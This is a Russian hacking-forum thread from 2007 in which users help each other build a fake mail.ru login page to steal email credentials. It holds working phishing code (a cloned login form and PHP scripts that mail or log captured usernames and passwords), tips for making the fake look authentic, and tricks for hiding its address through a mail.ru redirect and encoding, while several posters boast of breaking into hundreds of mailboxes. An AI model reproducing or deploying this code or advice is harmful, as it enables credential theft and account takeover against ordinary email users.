PDA

Просмотр полной версии : Фэйк странички mail.ru, имеется проблема


Shunt
04.04.2007, 15:53
В общем есть фейк страничка mail.ru. Как сделать чтобы все данные оставались на сайте или отправлялись на мыло. Права записи в ту директорию не позволяют напрямую записывать. максимум 755. Что делать?

Google00
04.04.2007, 17:08
Права записи в ту директорию не позволяют напрямую записывать. максимум 755.
А что за хост?

bendivu
04.04.2007, 17:54
Shunt
в принципе фек страничка наверное из ПХП значь там гдето можешь приписать функцию отправки на мыло

mail ("Кому", "Тема", "Текст сообщения", "Дополнительные заголовки")

Shunt
04.04.2007, 20:07
Хост holm.ru. Страницу сделал в папке www. Когда нажимаю на ввод то вылезает страница агавы с надписью CGI script error

Ошибка исполнения CGI приложения
Русское описание
CGI приложение доступно на запись другим пользователям. Для выполнения оно должно иметь права 0755 или 0711.

Если права сделать как они просят, то вообще белый лист.

Shunt
04.04.2007, 20:23
В общем понял что надо. Нужен простенький скрипт php чтобы при обращении к нему он отсылал нужные данные. Сейчас попробую поискать

Petr
04.04.2007, 22:29
Читай все, там есть ответы
http://forum.antichat.ru/thread34112.html

Petr
04.04.2007, 22:31
тебе на пхп файл права 777 не нужны, тебе их на тхт нужно выставить ;)

Shunt
04.04.2007, 22:45
написал тому челу в приват у кого скрипт. В теме он удален.

stalles
05.04.2007, 13:42
на безплатных неканает!
юзай вэб шэл!

Petr
05.04.2007, 16:48
на безплатных неканает!
юзай вэб шэл!
Эт почему не канает :-\

Undernative
06.04.2007, 01:04
Писалось очнь давно и не так красиво как можно :)

Вставляешь это в свою фейк страницу и подгоняешь там как тебе надо


<IFRAME name=content align=middle
src="form.php"
frameBorder=0 width=390 scrolling=no
height=405>
</IFRAME></h1>


Это вобщем ссылаеться на form.php

Создаешь form.php и вписываешь это



<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="form.files/dubie.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0
topMargin=0>
<FORM action=send.php method=post>
<P>Логин :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT size=30 name=Name><tr><td class=form width=100%>
<td><select size=1 name=Domain class=long tabindex=2>
<option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option>
</select></td>
</table>
</td>
</tr></P>
<P>Пароль:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT type=password
size=30 name=Email></P>
<BR><BR>
<CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML>



и еще файлик send.php в который вставляешь код и в нем вписываешь свой мыльник


<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="register_files/dubie.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.3790.0" name=GENERATOR></HEAD>
<BODY style="FONT-SIZE: 10px; FONT-FAMILY: Verdna" bgColor=#ffffff
text=#ff0000 leftMargin=0 topMargin=0>

<?php


$info = "Name:\t$Name\n";
$info .= "Password:\t$Email\n";
$info .= "Message:\t$Message\n\n";

$send_to = "ТУТ ВПИСЫВАЕШЬ МЫЛО"; // Change this
$subject = "Новый пароль от лошка $Name"; // Change this
$website = "www.www.com"; // Change this

$headers = "From: Лохотрон в действии <> \n";
$headers .= "Reply-To: $email\n\n";

$send = mail($send_to, $subject, $info, $headers);
if($send == 1)
{

print ("<center><font size=2>Уважаемый пользователь $Name, Мы рады что вы подключили данную услугу. Спасибо за сотрудничество. Администрация </font></center></b>.<br><br><br><br><br><br><br><br><br><br>");

}
else

print ("Услуга подключена");
?>

</BODY>
</HTML>


Все сливаешь и тестишь,желательно юзать на holm.ru там ресче работает :/

Если захочешь изменить текст в файле send.php найдешь где и че мона поменять.Вобщем вот... НЕ судите,я как не знал ПХП так и не знаю ... просто это первое что написал,так как надо было ,а потом сам же забросил ...Время мало.

Petr
06.04.2007, 01:56
RemaerD, молодец что написал, но это очень геморойно.

stalles
06.04.2007, 14:21
Эт почему не канает :-\

нехватает прав

Petr
06.04.2007, 17:19
нехватает прав
Все хвотает, ставь доступ 777

nc.STRIEM
06.04.2007, 18:20
максимум 755. Что делать?
а я думал для записи в файл хватит 666 на этот файл!
мда..

Shunt
06.04.2007, 23:46
RemaerD спасибо. ха-завтра попробую ;)

Petr
07.04.2007, 16:24
RemaerD +1
Спасибо за теги, всё работает. Как вам мой фейк (www.sitesite.h17.ru) , может что поправить надо? Уже взломал несколько мыльниц.
Делай фейк с этой страницы, а то я бы по втоей точно не прошел! http://win.mail.ru/cgi-bin/auth

FindeR
07.04.2007, 16:27
В оригинале не "Логин", а "Имя". Список доменов не в том порядке идёт.
И текстовые поля сделай поближе друг к другу. Сделай ссылку "Забыли пароль".
Галочка "Чужой компьютер" тож не помешает.
А после нажатия кнопки "Войти" пусть юзеров перекидывает на настоящую страницу.
Текст с "подключением услуги..." лучше замени на чё-нить другое -)
И вообще, отсюда оформление\стиль возьми... http://win.mail.ru/cgi-bin/auth

Petr
07.04.2007, 17:08
В оригинале не "Логин", а "Имя". Список доменов не в том порядке идёт.
И текстовые поля сделай поближе друг к другу. Сделай ссылку "Забыли пароль".
Галочка "Чужой компьютер" тож не помешает.
А после нажатия кнопки "Войти" пусть юзеров перекидывает на настоящую страницу.
Текст с "подключением услуги..." лучше замени на чё-нить другое -)
И вообще, отсюда оформление\стиль возьми... http://win.mail.ru/cgi-bin/auth
Смотри поствыше ;)

Petr
07.04.2007, 19:30
Буду благодарен, если поможете мне это сделать, особенно про текстовые поля и перекидывания юзеров на настоящую страницу.
тебе саму страничку выдернуть надо! и свой пхп скрипт оптимизировать под неё

Undernative
07.04.2007, 21:08
http://dump.ru/files/6/6442175733/ - более правдоподобный вариант.
попробуйте кто нить подогнать ровно чтобы было ,если кому надо:/

Shunt
07.04.2007, 22:32
Что то не получается у меня ничего. Хост hut.ru. Сделал вроде как написано, после это вылезает сообщение типо спасибо и тп. но на мыло ничего не приходит. Хотя наверно я что то не так делаю.

Linuxoid
08.04.2007, 02:06
Что то не получается у меня ничего. Хост hut.ru. Сделал вроде как написано, после это вылезает сообщение типо спасибо и тп. но на мыло ничего не приходит. Хотя наверно я что то не так делаю.
Хммм... А почему именно на мыло? Не проще будет в файл сохранить? :) Или сделать вообще изощренное сохранение в БД?
Пример как это счастье можно закатать в файл?


$msg = "$name $pass\n";
$write = fopen("file.txt","a");
fputs($write, $msg);
fclose($write);
Попробуй так сделать... ;) Функция mail() и у меня на HUT криво работала (если честно - у меян просто ничего не отправлялось... :))

Shunt
08.04.2007, 14:56
Linuxoid, а можешь подробнее написать. Что то опять не идет. Выходит вообще на несуществующую страницу.

wano81
10.04.2007, 22:06
Вообще есть проблема с фэйком на mail.ru!!! когда жертва нажымает на ссыль, то там показывается истинный адрес вот для примера http://img123.imageshack.us/img123/4272/90482878hv0.th.jpg (http://img123.imageshack.us/my.php?image=90482878hv0.jpg)

Может у когото есть предложения как обойтись с этой проблемой

Ksander
10.04.2007, 22:15
http://img123.imageshack.us/img123/4272/90482878hv0.th.jpg (http://img123.imageshack.us/my.php?image=90482878hv0.jpg)

Может у когото есть предложения как обойтись с этой проблемой

Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(

Mosvit
11.04.2007, 19:07
Я вообще не прячу ссылку , большинство пользователей при заходе на страницу даже не смотрят адрес. Благодоря фейку уже больше 10 штук взломал.
Вообще есть проблема с фэйком на mail.ru!!! когда жертва нажымает на ссыль, то там показывается истинный адрес вот для примера При заходе на твой фейк выскакивает реклама, которой быть не должно. На холме не пробовал размешять? там нет реклам.
Не могбы скинуть фейк своей страницы вместе с PHP скриптами. Твой выглядит правдоподобней

Undernative
11.04.2007, 21:40
Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(

Бугага =)

Скриптег в асе дам :) и кое что покажу ;)

wano81
11.04.2007, 22:20
Фэйк мне очень помог я при помощи него сломал порядка 400 Жертв!
теперь вот проблема с тем что адрес высвечивается!

bxN5
11.04.2007, 23:12
А раньше такой проблемы не было?

wano81
11.04.2007, 23:23
А раньше такой проблемы не было?

Нет раньше не было появилась только недавно недели 2!

Petr
12.04.2007, 00:55
Как ты ссылку скрыл? я сколько не пробывал вариантов, постоянно рубит =(
Я нашел решение ;) , надо чтобы фейк был в корне и в индес.пхп, потом просто делаеш ссылку ввида r.mail.ru/твой сайт в ASCII шифровке и усе ;)

wano81
16.04.2007, 20:31
попробуй редирект, типа
http://r.mail.ru/clb26353/www.yousite.ru


нет редирект не пускает!

Petr
16.04.2007, 21:13
нет редирект не пускает!
шифруй саму страничку! и пустить все как по маслу ;)

stalles
18.04.2007, 14:10
Легко! чтоб невыскакивало нада пробел поставить! где? сам подумай!
эту шнягу сразу решил!